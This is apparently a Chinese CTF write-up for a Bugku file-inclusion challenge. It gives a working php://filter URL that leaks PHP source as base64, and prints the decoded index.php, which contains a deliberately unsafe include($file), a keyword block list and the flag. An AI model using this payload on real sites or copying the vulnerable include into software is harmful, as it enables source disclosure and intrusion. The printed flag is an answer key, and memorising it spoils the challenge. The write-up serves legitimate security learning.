这道题本来以为是简单抓包题,没想到是文件包含题目,让我打开了新世界大门。
老规矩,先打开他要求的网页查看。
查看源代码。
并没有什么东西。
点击了之后也是出现一行字。
源代码也没有任何东西。
这时候想到抓包,看了老半天的包,里面也是啥都没发现。只能百度了
百度说这是文件包含漏洞,给了一串url命令,主要是让file=index的意思,这岂不是完全依赖于题目提示了,看来题目还是非常关键的东西。
http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
之前还想过直接将file=index.php,但是行不通,所以说还是需要前面一大串字符的。
科普知识来啦:
php:// — 访问各个输入/输出流(I/O streams)
php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。
read=<读链的筛选列表> | 该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。 |
然后需要以base64解码的过程来阅读。【这点我也是惊讶
resource=<要过滤的数据流> | 这个参数是必须的。它指定了你要筛选过滤的数据流。 |
来源:PHP官方文档
获得这串字符之后。
开始base64解码。
<html>
<title>Bugku-ctf</title>
<?php
error_reporting(0);
if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag:flag{edulcni_elif_lacol_si_siht}
?>
</html>
flag就在里面了,看到啦!!不过以后已经预想到了,在找到这源PHP的时候,还有继续可以深挖的坑...不过不知道是不是文件包含的时候,应该需要尝试吧,不然怎么知道是这个漏洞呢??
真是复杂。
来吧,让我们一起努力!!奋斗中。